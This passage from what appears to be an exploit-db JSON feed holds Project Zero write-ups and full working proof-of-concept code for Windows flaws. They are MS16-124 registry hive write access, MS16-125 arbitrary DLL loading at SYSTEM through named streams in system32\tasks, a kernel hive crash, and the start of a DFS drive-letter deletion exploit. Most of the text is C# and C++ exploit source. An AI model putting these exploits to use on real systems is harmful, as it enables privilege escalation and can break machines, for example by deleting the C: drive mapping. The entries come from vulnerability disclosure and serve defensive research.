UnicodeString(string str)\r\n {\r\n Length = (ushort)(str.Length * 2);\r\n MaximumLength = (ushort)((str.Length * 2) + 1);\r\n Buffer = str;\r\n }\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class ObjectAttributes : IDisposable\r\n {\r\n int Length;\r\n IntPtr RootDirectory;\r\n IntPtr ObjectName;\r\n AttributeFlags Attributes;\r\n IntPtr SecurityDescriptor;\r\n IntPtr SecurityQualityOfService;\r\n\r\n private static IntPtr AllocStruct(object s)\r\n {\r\n int size = Marshal.SizeOf(s);\r\n IntPtr ret = Marshal.AllocHGlobal(size);\r\n Marshal.StructureToPtr(s, ret, false);\r\n return ret;\r\n }\r\n\r\n private static void FreeStruct(ref IntPtr p, Type struct_type)\r\n {\r\n Marshal.DestroyStructure(p, struct_type);\r\n Marshal.FreeHGlobal(p);\r\n p = IntPtr.Zero;\r\n }\r\n\r\n public ObjectAttributes(string object_name)\r\n {\r\n Length = Marshal.SizeOf(this);\r\n if (object_name != null)\r\n {\r\n ObjectName = AllocStruct(new UnicodeString(object_name));\r\n }\r\n Attributes = AttributeFlags.None;\r\n }\r\n\r\n public void Dispose()\r\n {\r\n if (ObjectName != IntPtr.Zero)\r\n {\r\n FreeStruct(ref ObjectName, typeof(UnicodeString));\r\n }\r\n GC.SuppressFinalize(this);\r\n }\r\n\r\n ~ObjectAttributes()\r\n {\r\n Dispose();\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum LoadKeyFlags\r\n {\r\n None = 0,\r\n AppKey = 0x10,\r\n Exclusive = 0x20,\r\n Unknown800 = 0x800,\r\n ReadOnly = 0x2000,\r\n }\r\n\r\n [Flags]\r\n public enum GenericAccessRights : uint\r\n {\r\n None = 0,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n public class NtException : ExternalException\r\n {\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern IntPtr GetModuleHandle(string modulename);\r\n\r\n [Flags]\r\n enum FormatFlags\r\n {\r\n AllocateBuffer = 0x00000100,\r\n FromHModule = 0x00000800,\r\n FromSystem = 0x00001000,\r\n IgnoreInserts = 0x00000200\r\n }\r\n\r\n [DllImport(\"kernel32.dll\", CharSet = CharSet.Unicode, SetLastError = true)]\r\n private static extern int FormatMessage(\r\n FormatFlags dwFlags,\r\n IntPtr lpSource,\r\n int dwMessageId,\r\n int dwLanguageId,\r\n out IntPtr lpBuffer,\r\n int nSize,\r\n IntPtr Arguments\r\n );\r\n\r\n [DllImport(\"kernel32.dll\")]\r\n private static extern IntPtr LocalFree(IntPtr p);\r\n\r\n private static string StatusToString(int status)\r\n {\r\n IntPtr buffer = IntPtr.Zero;\r\n try\r\n {\r\n if (FormatMessage(FormatFlags.AllocateBuffer | FormatFlags.FromHModule | FormatFlags.FromSystem | FormatFlags.IgnoreInserts,\r\n GetModuleHandle(\"ntdll.dll\"), status, 0, out buffer, 0, IntPtr.Zero) > 0)\r\n {\r\n return Marshal.PtrToStringUni(buffer);\r\n }\r\n }\r\n finally\r\n {\r\n if (buffer != IntPtr.Zero)\r\n {\r\n LocalFree(buffer);\r\n }\r\n }\r\n return String.Format(\"Unknown Error: 0x{0:X08}\", status);\r\n }\r\n\r\n public NtException(int status) : base(StatusToString(status))\r\n {\r\n }\r\n }\r\n\r\n public static void StatusToNtException(int status)\r\n {\r\n if (status < 0)\r\n {\r\n throw new NtException(status);\r\n }\r\n } \r\n\r\n [DllImport(\"Advapi32.dll\")]\r\n static extern bool ImpersonateAnonymousToken(\r\n IntPtr ThreadHandle);\r\n\r\n [DllImport(\"Advapi32.dll\")]\r\n static extern bool RevertToSelf();\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n public static extern int NtLoadKeyEx(ObjectAttributes DestinationName, ObjectAttributes FileName, LoadKeyFlags Flags,\r\n IntPtr TrustKeyHandle, IntPtr EventHandle, GenericAccessRights DesiredAccess, out SafeRegistryHandle KeyHandle, int Unused);\r\n\r\n static RegistryKey LoadKey(string path, bool read_only)\r\n {\r\n string reg_name = @\"\\Registry\\A\\\" + Guid.NewGuid().ToString(\"B\");\r\n ObjectAttributes KeyName = new ObjectAttributes(reg_name);\r\n ObjectAttributes FileName = new ObjectAttributes(@\"\\??\\\" + path);\r\n SafeRegistryHandle keyHandle;\r\n LoadKeyFlags flags = LoadKeyFlags.AppKey;\r\n if (read_only)\r\n flags |= LoadKeyFlags.ReadOnly;\r\n\r\n int status = NtLoadKeyEx(KeyName,\r\n FileName, flags, IntPtr.Zero,\r\n IntPtr.Zero, GenericAccessRights.GenericRead, out keyHandle, 0);\r\n if (status != 0)\r\n return null;\r\n return RegistryKey.FromHandle(keyHandle); \r\n }\r\n\r\n static bool CheckForLogs(string path)\r\n {\r\n return File.Exists(path + \".LOG1\") || File.Exists(path + \".LOG2\");\r\n }\r\n\r\n static void DoExploit()\r\n {\r\n string path = Path.GetFullPath(\"dummy.hiv\");\r\n RegistryKey key = LoadKey(path, false); \r\n if (key == null)\r\n {\r\n throw new Exception(\"Something went wrong, couldn't create dummy hive\");\r\n }\r\n key.Close();\r\n \r\n // Ensure the log files are deleted.\r\n File.Delete(path + \".LOG1\");\r\n File.Delete(path + \".LOG2\");\r\n if (CheckForLogs(path))\r\n {\r\n throw new Exception(\"Couldn't delete log files\");\r\n }\r\n\r\n key = LoadKey(path, true);\r\n if (key == null || CheckForLogs(path))\r\n {\r\n throw new Exception(\"Didn't open hive readonly\");\r\n }\r\n key.Close();\r\n\r\n ImpersonateAnonymousToken(new IntPtr(-2));\r\n key = LoadKey(path, true);\r\n RevertToSelf();\r\n if (!CheckForLogs(path))\r\n {\r\n throw new Exception(\"Log files not recreated\");\r\n }\r\n\r\n Console.WriteLine(\"[SUCCESS]: Read Only Hive Opened with Write Access\");\r\n }\r\n\r\n static void Main(string[] args)\r\n {\r\n try\r\n {\r\n DoExploit(); \r\n }\r\n catch (Exception ex)\r\n {\r\n Console.WriteLine(\"[ERROR]: {0}\", ex.Message);\r\n }\r\n }\r\n }\r\n}\r\n", "cvss": {"score": 2.1, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40608/"}, {"lastseen": "2016-10-18T09:29:27", "description": "Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125). CVE-2016-7188. Local exploit for Windows platform", "published": "2016-10-17T00:00:00", "type": "exploitdb", "title": "Microsoft Windows Diagnostics Hub - DLL Load Privilege Escalation (MS16-125)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7188"], "modified": "2016-10-17T00:00:00", "id": "EDB-ID:40562", "href": "https://www.exploit-db.com/exploits/40562/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=887\r\n\r\nWindows: Diagnostics Hub DLL Load EoP\r\nPlatform: Windows 10 10586, not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe fix for CVE-2016-3231 is insufficient to prevent a normal user specifying an insecure agent path leading to arbitrary DLL loading at system privileges.\r\n\r\nDescription:\r\n\r\nCVE-2016-3231 was an issue caused by passing a relative agent path name which allowed the DLL path loaded for the agent DLL to be redirected to another file. This seems to have been fixed and as far as I can tell this issue is no longer exploitable from a sandbox. However the problem is there\u2019s an assumption that it\u2019s not possible to write a file to the system32 directory, which technically is true but practically for this exploit false. \r\n\r\nAs I\u2019ve blogged about before, and also submitted bugs (for example MSRC-21233) a normal user can created named streams on directories as long as they have FILE_ADD_FILE access right to the directory. When you do this you create what looks from a path perspective to be in the parent. For example the system32\\tasks folder is writable by a normal user, so you can copy a DLL to system32\\tasks:abc.dll and when GetFullPathName is called the filename returned is tasks:abc.dll. When the GetValidAgentPath is called it checks if this file is in system32 by using GetFileAttributes, which succeeds and the service will proceed to load the file.\r\n\r\nOn the fixing side of things, I can\u2019t see an obvious reason why just checking for invalid path characters in the agent path wouldn\u2019t be sufficient (and in fact would arguably have fixed the original bug as well). Of course I think it\u2019s slightly dodgy that you\u2019ll load any DLL from system32, even ones which aren\u2019t agent DLLs. You\u2019d have to find something which was somehow exploitable in a very short time window during DllMain but it might work.\r\n\r\nAlso I wonder whether they\u2019re any legitimate uses for named streams on NTFS directories? While it\u2019s certainly out of scope perhaps they could only be created by admins? Or perhaps the access check shouldn\u2019t be on the target directories but its parent directory where the effective file appears to be located. \r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C++ source code file. You\u2019ll also need a DLL to test load, I\u2019ve not provided one of these but any should do, as long as it matches the bitness of the OS.\r\n\r\n1) Compile the C++ source code file.\r\n2) Execute the poc passing the path to the DLL you want to load in the service as a normal user.\r\n3) It should print that the DLL was loaded successfully.\r\n\r\nExpected Result:\r\nThe loading of a DLL fails as the path is rejected.\r\n\r\nObserved Result:\r\nThe DLL is loaded successfully.\r\n*/\r\n\r\n\r\n// ExploitCollector.cpp : Defines the entry point for the console application.\r\n//\r\n\r\n#include <stdio.h>\r\n#include <tchar.h>\r\n#include <Windows.h>\r\n#include <comdef.h>\r\n#include <strsafe.h>\r\n\r\nGUID CLSID_CollectorService = \r\n { 0x42CBFAA7, 0xA4A7, 0x47BB,{ 0xB4, 0x22, 0xBD, 0x10, 0xE9, 0xD0, 0x27, 0x00, } };\r\n\r\nclass __declspec(uuid(\"f23721ef-7205-4319-83a0-60078d3ca922\")) ICollectionSession : public IUnknown {\r\npublic:\r\n\r\n virtual HRESULT __stdcall PostStringToListener(REFGUID, LPWSTR) = 0;\r\n virtual HRESULT __stdcall PostBytesToListener() = 0;\r\n virtual HRESULT __stdcall AddAgent(LPWSTR path, REFGUID) = 0;\r\n //.rdata:0000000180035868 dq offset ? Start@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Start(tagVARIANT *)\r\n //.rdata:0000000180035870 dq offset ? GetCurrentResult@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJFPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetCurrentResult(short, tagVARIANT *)\r\n //.rdata:0000000180035878 dq offset ? Pause@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Pause(void)\r\n //.rdata:0000000180035880 dq offset ? Resume@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJXZ; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Resume(void)\r\n //.rdata:0000000180035888 dq offset ? Stop@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAUtagVARIANT@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::Stop(tagVARIANT *)\r\n //.rdata:0000000180035890 dq offset ? TriggerEvent@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJW4SessionEvent@@PEAUtagVARIANT@@11@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::TriggerEvent(SessionEvent, tagVARIANT *, tagVARIANT *, tagVARIANT *)\r\n //.rdata:0000000180035898 dq offset ? GetGraphDataUpdates@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJAEBU_GUID@@PEAUtagSAFEARRAY@@PEAUGraphDataUpdates@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetGraphDataUpdates(_GUID const &, tagSAFEARRAY *, GraphDataUpdates *)\r\n //.rdata:00000001800358A0 dq offset ? QueryState@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAW4SessionState@@@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::QueryState(SessionState *)\r\n //.rdata:00000001800358A8 dq offset ? GetStatusChangeEventName@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAPEAG@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetStatusChangeEventName(ushort * *)\r\n //.rdata:00000001800358B0 dq offset ? GetLastError@EtwCollectionSession@StandardCollector@DiagnosticsHub@Microsoft@@UEAAJPEAJ@Z; Microsoft::DiagnosticsHub::StandardCollector::EtwCollectionSession::GetLastError(long *)\r\n //.rdata:00000001800358B8 dq offset ? SetClientDelegate@EtwCollectionSession@StandardCollector@DiagnosticsHub@Mic\r\n};\r\n\r\nstruct SessionConfiguration\r\n{\r\n DWORD version; // Needs to be 1\r\n DWORD a1; // Unknown\r\n DWORD something; // Also unknown\r\n DWORD monitor_pid;\r\n GUID guid;\r\n BSTR path; // Path to a valid directory\r\n CHAR trailing[256];\r\n};\r\n\r\nclass __declspec(uuid(\"7e912832-d5e1-4105-8ce1-9aadd30a3809\")) IStandardCollectorClientDelegate : public IUnknown\r\n{\r\n};\r\n\r\nclass __declspec(uuid(\"0d8af6b7-efd5-4f6d-a834-314740ab8caa\")) IStandardCollectorService : public IUnknown\r\n{\r\npublic:\r\n virtual HRESULT __stdcall CreateSession(SessionConfiguration *, IStandardCollectorClientDelegate *, ICollectionSession **) = 0;\r\n virtual HRESULT __stdcall GetSession(REFGUID, ICollectionSession **) = 0;\r\n virtual HRESULT __stdcall DestroySession(REFGUID) = 0;\r\n virtual HRESULT __stdcall DestroySessionAsync(REFGUID) = 0;\r\n virtual HRESULT __stdcall AddLifetimeMonitorProcessIdForSession(REFGUID, int) = 0;\r\n};\r\n\r\n_COM_SMARTPTR_TYPEDEF(IStandardCollectorService, __uuidof(IStandardCollectorService));\r\n_COM_SMARTPTR_TYPEDEF(ICollectionSession, __uuidof(ICollectionSession));\r\n\r\nclass CoInit\r\n{\r\npublic:\r\n CoInit() {\r\n CoInitialize(nullptr);\r\n }\r\n\r\n ~CoInit() {\r\n CoUninitialize();\r\n }\r\n};\r\n\r\nvoid ThrowOnError(HRESULT hr)\r\n{\r\n if (hr != 0)\r\n {\r\n throw _com_error(hr);\r\n }\r\n}\r\n\r\nint wmain(int argc, wchar_t** argv)\r\n{\r\n if (argc < 2)\r\n {\r\n printf(\"poc path\\\\to\\\\dll\\n\");\r\n return 1;\r\n }\r\n\r\n CoInit coinit;\r\n try\r\n {\r\n GUID name;\r\n CoCreateGuid(&name);\r\n LPOLESTR name_str;\r\n StringFromIID(name, &name_str);\r\n\r\n WCHAR random_name[MAX_PATH];\r\n StringCchPrintf(random_name, MAX_PATH, L\"tasks:%ls.dll\", name_str);\r\n\r\n WCHAR target[MAX_PATH];\r\n GetSystemDirectory(target, MAX_PATH);\r\n StringCchCat(target, MAX_PATH, L\"\\\\\");\r\n StringCchCat(target, MAX_PATH, random_name);\r\n\r\n WCHAR valid_dir[MAX_PATH];\r\n GetModuleFileName(nullptr, valid_dir, MAX_PATH);\r\n WCHAR* p = wcsrchr(valid_dir, L'\\\\');\r\n *p = 0;\r\n StringCchCat(valid_dir, MAX_PATH, L\"\\\\etw\");\r\n CreateDirectory(valid_dir, nullptr);\r\n\r\n if (!CopyFile(argv[1], target, FALSE))\r\n {\r\n printf(\"Error copying file %d\\n\", GetLastError());\r\n return 1;\r\n }\r\n\r\n IStandardCollectorServicePtr service;\r\n ThrowOnError(CoCreateInstance(CLSID_CollectorService, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&service)));\r\n DWORD authn_svc;\r\n DWORD authz_svc;\r\n LPOLESTR principal_name;\r\n DWORD authn_level;\r\n DWORD imp_level;\r\n RPC_AUTH_IDENTITY_HANDLE identity;\r\n DWORD capabilities;\r\n\r\n ThrowOnError(CoQueryProxyBlanket(service, &authn_svc, &authz_svc, &principal_name, &authn_level, &imp_level, &identity, &capabilities));\r\n ThrowOnError(CoSetProxyBlanket(service, authn_svc, authz_svc, principal_name, authn_level, RPC_C_IMP_LEVEL_IMPERSONATE, identity, capabilities));\r\n SessionConfiguration config = {};\r\n config.version = 1;\r\n config.monitor_pid = ::GetCurrentProcessId();\r\n CoCreateGuid(&config.guid);\r\n bstr_t path = valid_dir;\r\n config.path = path;\r\n ICollectionSessionPtr session;\r\n\r\n ThrowOnError(service->CreateSession(&config, nullptr, &session));\r\n GUID agent_guid;\r\n CoCreateGuid(&agent_guid);\r\n ThrowOnError(session->AddAgent(random_name, agent_guid));\r\n }\r\n catch (const _com_error& error)\r\n {\r\n if (error.Error() == 0x8007045A)\r\n {\r\n printf(\"DLL should have been loaded\\n\");\r\n }\r\n else\r\n {\r\n printf(\"%ls\\n\", error.ErrorMessage());\r\n printf(\"%08X\\n\", error.Error());\r\n }\r\n }\r\n\r\n return 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/40562/"}, {"lastseen": "2016-10-21T01:29:48", "description": "Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124). CVE-2016-0070. Dos exploit for Windows platform", "published": "2016-10-20T00:00:00", "type": "exploitdb", "title": "Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-0070"], "modified": "2016-10-20T00:00:00", "id": "EDB-ID:40600", "href": "https://www.exploit-db.com/exploits/40600/", "sourceData": "Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=873\r\n\r\nWe have encountered Windows kernel crashes in the memmove() function called by nt!CmpCheckValueList while loading corrupted registry hive files. An example of a crash log excerpt generated after triggering the bug is shown below:\r\n\r\n---\r\nATTEMPTED_WRITE_TO_READONLY_MEMORY (be)\r\nAn attempt was made to write to readonly memory. The guilty driver is on the\r\nstack trace (and is typically the current instruction pointer).\r\nWhen possible, the guilty driver's name (Unicode string) is printed on\r\nthe bugcheck screen and saved in KiBugCheckDriver.\r\nArguments:\r\nArg1: b008d000, Virtual address for the attempted write.\r\nArg2: 45752121, PTE contents.\r\nArg3: a5d9b590, (reserved)\r\nArg4: 0000000b, (reserved)\r\n\r\nDebugging Details:\r\n------------------\r\n\r\n[...]\r\n\r\nSTACK_TEXT: \r\na5d9b60c 81820438 b008cb40 b008cb44 fffffffc nt!memmove+0x33\r\na5d9b670 8181f4f0 ab3709c8 00000000 b008cb34 nt!CmpCheckValueList+0x520\r\na5d9b6bc 8181fc01 03010001 0000b3b8 00000020 nt!CmpCheckKey+0x661\r\na5d9b6f4 818206d0 ab3709c8 03010001 00000001 nt!CmpCheckRegistry2+0x89\r\na5d9b73c 8182308f 03010001 8000057c 80000498 nt!CmCheckRegistry+0xfb\r\na5d9b798 817f6fa0 a5d9b828 00000002 00000000 nt!CmpInitializeHive+0x55c\r\na5d9b85c 817f7d85 a5d9bbb8 00000000 a5d9b9f4 nt!CmpInitHiveFromFile+0x1be\r\na5d9b9c0 817ffaae a5d9bbb8 a5d9ba88 a5d9ba0c nt!CmpCmdHiveOpen+0x50\r\na5d9bacc 817f83b8 a5d9bb90 a5d9bbb8 00000010 nt!CmLoadKey+0x459\r\na5d9bc0c 8168edc6 0025fd58 00000000 00000010 nt!NtLoadKeyEx+0x56c\r\na5d9bc0c 77806bf4 0025fd58 00000000 00000010 nt!KiSystemServicePostCall\r\nWARNING: Frame IP not in any known module. Following frames may be wrong.\r\n0025fdc0 00000000 00000000 00000000 00000000 0x77806bf4\r\n---\r\n\r\nThe root cause of the bug seems to be that the nt!CmpCheckValueList function miscalculates the number of items to be shifted to the left in an array with 4-byte entries, resulting in the following call:\r\n\r\nRtlMoveMemory(&array[x], &array[x + 1], 4 * (--y - x));\r\n\r\nHere, the eventual value of the size parameter becomes negative (--y is smaller than x), but is treated by RtlMoveMemory as an unsigned integer, which is way beyond the size of the memory region, resulting in memory corruption. In a majority of observed cases, the specific negative value ended up being 0xfffffffc (-4), but we have also seen a few samples which crashed with size=0xfffffff8 (-8).\r\n\r\nThe issue reproduces on Windows 7. Considering the huge memory copy size, the crash should manifest both with and without Special Pools enabled. In order to reproduce the problem with the provided samples, it is necessary to load them with a dedicated program which calls the RegLoadAppKey() API.\r\n\r\nAttached are three proof of concept hive files.\r\n\r\n\r\nProof of Concept:\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/40600.zip\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/40600/"}, {"lastseen": "2016-10-19T01:30:06", "description": "Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123). CVE-2016-7185. Local exploit for Windows platform", "published": "2016-10-18T00:00:00", "type": "exploitdb", "title": "Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-7185"], "modified": "2016-10-18T00:00:00", "id": "EDB-ID:40572", "href": "https://www.exploit-db.com/exploits/40572/", "sourceData": "/*\r\nSource: https://bugs.chromium.org/p/project-zero/issues/detail?id=885\r\n\r\nWindows: DFS Client Driver Arbitrary Drive Mapping EoP\r\nPlatform: Windows 10 10586, Edge 25.10586.0.0 not tested 8.1 Update 2 or Windows 7\r\nClass: Elevation of Privilege\r\n\r\nSummary:\r\nThe DFS Client driver and running by default insecurely creates and deletes drive letter symbolic links in the current user context leading to EoP.\r\n\r\nDescription:\r\n\r\nThe DFS Client driver is used to map DFS shares. The device path is accessible by a normal user and the two IOCTL DfscFsctrlCreateDriveLetter and DfscFsctrlRemoveDriveLetter are marked as FILE_ANY_ACCESS so even through we only have read permission on the device they\u2019re allowed.\r\n\r\nWhen mapping a DFS share the driver calls DfscCreateSymbolicLink to create a drive letter symbolic link. The drive letter is entirely under the user\u2019s control and other than checking it\u2019s a letter no other verification takes place. This function calls ZwCreateSymbolicLinkObject without specifying OBJ_FORCE_ACCESS_CHECK meaning it disables access checking. As it\u2019s creating the name \\??\\X: rather than an explicit directory we can use per-process device maps to trick the driver into creating the symbolic link in any directory the user has read access to (the only limit on setting a per-process device map).\r\n\r\nIn contrast when unmapping DfscDeleteSymbolicLink is called which calls ZwOpenSymbolicLinkObject without specifying OBJ_FORCE_ACCESS_CHECK. This means we can delete any drive letter symbolic link by first mounting a DFS share with a drive letter we want to delete, then either removing the letter from our current user dos devices directory, or switching our per-process drive map to point to \\GLOBAL?? then unmapping.\r\n\r\nBy combining the two we can do something like deleting the C: drive, then mounting a DFS share in its place and get some system level code to run something from the C: drive to get elevated privileges. We don\u2019t even need to control the DFS share as once we\u2019ve created the new C: drive symbolic link we have delete privileges on the object. We can use a behaviour of CSRSS\u2019s DosDevice creation code which disables security if it can open the symbolic link for DELETE access while impersonating the user and the path to the link starts with \\GLOBAL??. So we could redirect the C: drive link to any local location we like.\r\n\r\nWorth nothing this is almost the exact same bug I found in Truecrypt (https://bugs.chromium.org/p/project-zero/issues/detail?id=538). At least they tried to not mount over existing drive letters requiring more effort :-)\r\n\r\nI\u2019ve not been able to work out if it\u2019s possible to do this without requiring a DFS share (although for an internet connected system you might be able to point it at almost anywhere). I also don\u2019t know if it needs to be domain joined, the driver is running though on a normal system. It seems to fail verifying the credentials, at least pointed to localhost SMB service. But perhaps it\u2019ll work somehow. \r\n\r\nProof of Concept:\r\n\r\nI\u2019ve provided a PoC as a C# source code file. You need to compile with .NET 4 or higher. Note you must compile as Any CPU or at least the correct bitness for the system under test other setting the dos devices directory has a habit of failing. You\u2019ll need to have access to a DFS share somewhere, which might mean the test system needs to be domain joined. \r\n\r\nThe PoC will just delete an existing drive mapping you specify. For example you could specify C: drive, although that\u2019ll make the system not work so well afterwards. \r\n\r\n1) Compile the C# source code file.\r\n2) Execute the poc passing the path to an existing DFS share and the drive letter to delete e.g. poc \\\\server\\share X:\r\n3) It should successfully delete the drive letter from \\GLOBAL??. \r\n\r\nExpected Result:\r\nCreate drive letter anywhere the user can\u2019t normally access should fail\r\n\r\nObserved Result:\r\nThe user can create and delete arbitrary global drive letters.\r\n*/\r\n\r\nusing Microsoft.Win32.SafeHandles;\r\nusing System;\r\nusing System.Collections.Generic;\r\nusing System.IO;\r\nusing System.Runtime.InteropServices;\r\nusing System.Security.AccessControl;\r\nusing System.Text;\r\n\r\nnamespace DfscTest\r\n{\r\n class Program\r\n {\r\n [Flags]\r\n public enum AttributeFlags : uint\r\n {\r\n None = 0,\r\n Inherit = 0x00000002,\r\n Permanent = 0x00000010,\r\n Exclusive = 0x00000020,\r\n CaseInsensitive = 0x00000040,\r\n OpenIf = 0x00000080,\r\n OpenLink = 0x00000100,\r\n KernelHandle = 0x00000200,\r\n ForceAccessCheck = 0x00000400,\r\n IgnoreImpersonatedDevicemap = 0x00000800,\r\n DontReparse = 0x00001000,\r\n }\r\n\r\n public class IoStatus\r\n {\r\n public IntPtr Pointer;\r\n public IntPtr Information;\r\n\r\n public IoStatus()\r\n {\r\n }\r\n\r\n public IoStatus(IntPtr p, IntPtr i)\r\n {\r\n Pointer = p;\r\n Information = i;\r\n }\r\n }\r\n\r\n [Flags]\r\n public enum ShareMode\r\n {\r\n None = 0,\r\n Read = 0x00000001,\r\n Write = 0x00000002,\r\n Delete = 0x00000004,\r\n }\r\n\r\n [Flags]\r\n public enum FileOpenOptions\r\n {\r\n None = 0,\r\n DirectoryFile = 0x00000001,\r\n WriteThrough = 0x00000002,\r\n SequentialOnly = 0x00000004,\r\n NoIntermediateBuffering = 0x00000008,\r\n SynchronousIoAlert = 0x00000010,\r\n SynchronousIoNonAlert = 0x00000020,\r\n NonDirectoryFile = 0x00000040,\r\n CreateTreeConnection = 0x00000080,\r\n CompleteIfOplocked = 0x00000100,\r\n NoEaKnowledge = 0x00000200,\r\n OpenRemoteInstance = 0x00000400,\r\n RandomAccess = 0x00000800,\r\n DeleteOnClose = 0x00001000,\r\n OpenByFileId = 0x00002000,\r\n OpenForBackupIntent = 0x00004000,\r\n NoCompression = 0x00008000,\r\n OpenRequiringOplock = 0x00010000,\r\n ReserveOpfilter = 0x00100000,\r\n OpenReparsePoint = 0x00200000,\r\n OpenNoRecall = 0x00400000,\r\n OpenForFreeSpaceQuery = 0x00800000\r\n }\r\n\r\n [Flags]\r\n public enum GenericAccessRights : uint\r\n {\r\n None = 0,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n };\r\n\r\n\r\n [Flags]\r\n enum DirectoryAccessRights : uint\r\n {\r\n Query = 1,\r\n Traverse = 2,\r\n CreateObject = 4,\r\n CreateSubDirectory = 8,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n [Flags]\r\n public enum ProcessAccessRights : uint\r\n {\r\n None = 0,\r\n CreateProcess = 0x0080,\r\n CreateThread = 0x0002,\r\n DupHandle = 0x0040,\r\n QueryInformation = 0x0400,\r\n QueryLimitedInformation = 0x1000,\r\n SetInformation = 0x0200,\r\n SetQuota = 0x0100,\r\n SuspendResume = 0x0800,\r\n Terminate = 0x0001,\r\n VmOperation = 0x0008,\r\n VmRead = 0x0010,\r\n VmWrite = 0x0020,\r\n MaximumAllowed = GenericAccessRights.MaximumAllowed\r\n };\r\n\r\n [Flags]\r\n public enum FileAccessRights : uint\r\n {\r\n None = 0,\r\n ReadData = 0x0001,\r\n WriteData = 0x0002,\r\n AppendData = 0x0004,\r\n ReadEa = 0x0008,\r\n WriteEa = 0x0010,\r\n Execute = 0x0020,\r\n DeleteChild = 0x0040,\r\n ReadAttributes = 0x0080,\r\n WriteAttributes = 0x0100,\r\n GenericRead = 0x80000000,\r\n GenericWrite = 0x40000000,\r\n GenericExecute = 0x20000000,\r\n GenericAll = 0x10000000,\r\n Delete = 0x00010000,\r\n ReadControl = 0x00020000,\r\n WriteDac = 0x00040000,\r\n WriteOwner = 0x00080000,\r\n Synchronize = 0x00100000,\r\n MaximumAllowed = 0x02000000,\r\n }\r\n\r\n [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n public sealed class UnicodeString\r\n {\r\n ushort Length;\r\n ushort MaximumLength;\r\n [MarshalAs(UnmanagedType.LPWStr)]\r\n string Buffer;\r\n\r\n public UnicodeString(string str)\r\n {\r\n Length = (ushort)(str.Length * 2);\r\n MaximumLength = (ushort)((str.Length * 2) + 1);\r\n Buffer = str;\r\n }\r\n }\r\n\r\n [DllImport(\"ntdll.dll\")]\r\n static extern int NtClose(IntPtr handle);\r\n\r\n public sealed class SafeKernelObjectHandle\r\n : SafeHandleZeroOrMinusOneIsInvalid\r\n {\r\n public SafeKernelObjectHandle()\r\n : base(true)\r\n {\r\n }\r\n\r\n public SafeKernelObjectHandle(IntPtr handle, bool owns_handle)\r\n : 